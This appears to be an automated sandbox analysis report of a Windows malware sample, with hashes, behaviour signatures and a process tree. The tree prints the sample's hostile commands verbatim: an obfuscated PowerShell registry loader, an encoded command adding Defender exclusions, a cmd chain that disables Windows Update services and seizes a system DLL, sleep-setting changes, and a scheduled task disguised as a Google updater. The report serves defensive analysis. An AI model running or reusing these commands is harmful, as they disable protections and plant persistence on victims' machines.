Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    14-08-2024 18:22

General

  • Target

    40eeb7e6dc706f7e0eac78cc85213220N.exe

  • Size

    4.8MB

  • MD5

    40eeb7e6dc706f7e0eac78cc85213220

  • SHA1

    28b55166002c4ba1c9af0ec4fd9f98b591d6e498

  • SHA256

    9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548

  • SHA512

    219713374a9bbaf254fd88f1834ca82fec95228b8de3890a466079866026491381caacd4309a9b7ab278cd5e92097fdee5105bbdbddc6c0b6743a6f871f6060f

  • SSDEEP

    98304:Ch5ZFrrBPngTB+XSOSp+yBmv1b4b4V+khcwhrkAkuRNSo:CTZFr5gT0XvyBmd4MsocFVuJ

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 10 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry key 1 TTPs 14 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:408
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{cbe60bff-e555-4475-bc84-4afd6cf62758}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1948
      • C:\Windows\SysWOW64\dllhost.exe
        C:\Windows\SysWOW64\dllhost.exe /Processid:{037cba3c-de0e-40c6-82ba-f4de163d725c}
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1956
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Suspicious behavior: LoadsDriver
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:584
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:1248
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k RPCSS
            2⤵
              PID:664
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
              2⤵
                PID:752
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:796
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1288
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of UnmapMainImage
                    PID:836
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {72413DC2-2A6C-4540-B344-0104681548B4} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                        PID:1132
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1344
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:952
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {B9FA45F4-EB0A-4D77-B31A-B0F05C23D11D} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]
                        3⤵
                        • Loads dropped DLL
                        PID:2404
                        • C:\Users\Admin\Google\Chrome\updater.exe
                          C:\Users\Admin\Google\Chrome\updater.exe
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2104
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="
                            5⤵
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2904
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                            5⤵
                              PID:1224
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                6⤵
                                • Launches sc.exe
                                PID:2172
                              • C:\Windows\system32\sc.exe
                                sc stop WaaSMedicSvc
                                6⤵
                                • Launches sc.exe
                                PID:2912
                              • C:\Windows\system32\sc.exe
                                sc stop wuauserv
                                6⤵
                                • Launches sc.exe
                                PID:1616
                              • C:\Windows\system32\sc.exe
                                sc stop bits
                                6⤵
                                • Launches sc.exe
                                PID:1204
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                6⤵
                                • Launches sc.exe
                                PID:2420
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                6⤵
                                • Modifies registry key
                                PID:264
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                6⤵
                                • Modifies registry key
                                PID:2780
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                6⤵
                                • Modifies registry key
                                PID:1556
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                6⤵
                                • Modifies registry key
                                PID:2172
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                6⤵
                                • Modifies registry key
                                PID:2528
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                6⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:2364
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                6⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:2608
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              5⤵
                              • Power Settings
                              PID:2856
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -hibernate-timeout-ac 0
                                6⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2764
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -hibernate-timeout-dc 0
                                6⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2016
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -standby-timeout-ac 0
                                6⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:884
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -standby-timeout-dc 0
                                6⤵
                                • Power Settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1688
                            • C:\Windows\System32\dialer.exe
                              C:\Windows\System32\dialer.exe "uscznjtdlrpzim"
                              5⤵
                                PID:2692
                              • C:\Windows\System32\dialer.exe
                                C:\Windows\System32\dialer.exe qogpttybmmmxi0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/mu1wJod3G4ybKfriFlvX5/cPzwC+grqJRncFX2oIaCyfgQwYP6oqAsEG81+jJCQn615LfOl9vDqqzuvSeBWHLRbB6RL3NI+uQLE2uPl2hMP1A8ZJSXCp5FNSxKz+yXD/3pmbyKEb10mByCjliFLzsw6IJHQ/U/t4Cy3hKy2hsX1MrQilste7aHM98jReFRFnY9V0hpt2FRrzdOIr9eBxZhGN4MtQ85PW3WIDt7sXsgtHPZMNwMSxC2lB5EW8mN2iLaBNv9P9/d5TzNalCUJ3tYTlHZ8k+EDexjNW2vVCitBX5qi8Qcugh54x/Ok44t8DlRY2E1nTgLgybRikhw6tWq2N32fhfpRZah0llH3luDEA33V1hXU5tEIDTdTdvtWVm5LOtDaE26OtMcfemyvXEyx5Xpl2V8/t+Nf6MKdylH0uzwa03zeM0xhOOP5d3bFAKRAqB3U5av+AkNeT2EsaabE5vtWDuynU6Bb1iu+qntQ=
                                5⤵
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:2452
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService
                          2⤵
                            PID:976
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k NetworkService
                            2⤵
                              PID:280
                            • C:\Windows\System32\spoolsv.exe
                              C:\Windows\System32\spoolsv.exe
                              2⤵
                                PID:964
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                2⤵
                                  PID:1016
                                • C:\Windows\system32\taskhost.exe
                                  "taskhost.exe"
                                  2⤵
                                    PID:1176
                                  • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                    "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                    2⤵
                                      PID:2020
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                      2⤵
                                        PID:1916
                                      • C:\Windows\system32\sppsvc.exe
                                        C:\Windows\system32\sppsvc.exe
                                        2⤵
                                          PID:1880
                                      • C:\Windows\system32\lsass.exe
                                        C:\Windows\system32\lsass.exe
                                        1⤵
                                          PID:476
                                        • C:\Windows\system32\lsm.exe
                                          C:\Windows\system32\lsm.exe
                                          1⤵
                                            PID:484
                                          • C:\Windows\Explorer.EXE
                                            C:\Windows\Explorer.EXE
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1352
                                            • C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe
                                              "C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:1360
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="
                                                3⤵
                                                • Drops file in System32 directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2092
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                3⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2756
                                                • C:\Windows\system32\sc.exe
                                                  sc stop UsoSvc
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:2936
                                                • C:\Windows\system32\sc.exe
                                                  sc stop WaaSMedicSvc
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:3004
                                                • C:\Windows\system32\sc.exe
                                                  sc stop wuauserv
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:2760
                                                • C:\Windows\system32\sc.exe
                                                  sc stop bits
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:2924
                                                • C:\Windows\system32\sc.exe
                                                  sc stop dosvc
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:2676
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2616
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2636
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                  4⤵
                                                  • Modifies security service
                                                  • Modifies registry key
                                                  PID:2684
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2692
                                                • C:\Windows\system32\reg.exe
                                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2528
                                                • C:\Windows\system32\takeown.exe
                                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2052
                                                • C:\Windows\system32\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:824
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:2980
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:1276
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:1724
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                  4⤵
                                                  • Modifies registry key
                                                  PID:532
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                  4⤵
                                                    PID:1900
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                    4⤵
                                                      PID:2380
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                      4⤵
                                                        PID:2576
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                        4⤵
                                                          PID:1992
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                          4⤵
                                                            PID:2272
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                            4⤵
                                                              PID:2360
                                                            • C:\Windows\system32\schtasks.exe
                                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                              4⤵
                                                                PID:740
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                              3⤵
                                                              • Power Settings
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2784
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -hibernate-timeout-ac 0
                                                                4⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2648
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -hibernate-timeout-dc 0
                                                                4⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2296
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -standby-timeout-ac 0
                                                                4⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2792
                                                              • C:\Windows\system32\powercfg.exe
                                                                powercfg /x -standby-timeout-dc 0
                                                                4⤵
                                                                • Power Settings
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2652
                                                            • C:\Windows\System32\conhost.exe
                                                              C:\Windows\System32\conhost.exe
                                                              3⤵
                                                              • Drops file in Windows directory
                                                              PID:1936
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""
                                                              3⤵
                                                                PID:2416
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""
                                                                  4⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:1444
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                                                3⤵
                                                                  PID:2516
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                                                    4⤵
                                                                      PID:2228
                                                              • C:\Windows\system32\conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe "49384658016723260351945230819-2035182398-168646351216807987814174275551674409703"
                                                                1⤵
                                                                  PID:828
                                                                • C:\Windows\system32\conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe "-1210583900-1864933382-504099959169151827521131715211941224944-15666506011230839723"
                                                                  1⤵
                                                                    PID:1476
                                                                  • C:\Windows\system32\conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe "-1302879950-840085889-702871329-800904320-2583387719883909082086569638-984941914"
                                                                    1⤵
                                                                      PID:2152
                                                                    • C:\Windows\system32\conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe "1715209253-1549303545-2018470893-1593325933-1324999412-740847104-1082938555-1032977077"
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:2696
                                                                    • C:\Windows\system32\conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe "227570323-1575764454-14458156771985709915-1950362717-886438917-12731077391047296245"
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:2988

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Temp\CabA9A9.tmp

                                                                      Filesize

                                                                      70KB

                                                                      MD5

                                                                      49aebf8cbd62d92ac215b2923fb1b9f5

                                                                      SHA1

                                                                      1723be06719828dda65ad804298d0431f6aff976

                                                                      SHA256

                                                                      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                      SHA512

                                                                      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                    • C:\Users\Admin\AppData\Local\Temp\TarA9EB.tmp

                                                                      Filesize

                                                                      181KB

                                                                      MD5

                                                                      4ea6026cf93ec6338144661bf1202cd1

                                                                      SHA1

                                                                      a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                      SHA256

                                                                      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                      SHA512

                                                                      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                      Filesize

                                                                      7KB

                                                                      MD5

                                                                      89705267bdaf059f6a554857043242c0

                                                                      SHA1

                                                                      c2f26480d15e8d74b35f6426553e0be36b976cc7

                                                                      SHA256

                                                                      332d9fd123e376d450cdef38b1eb5dfacaff32d3a506fe2e4f97462955e75f87

                                                                      SHA512

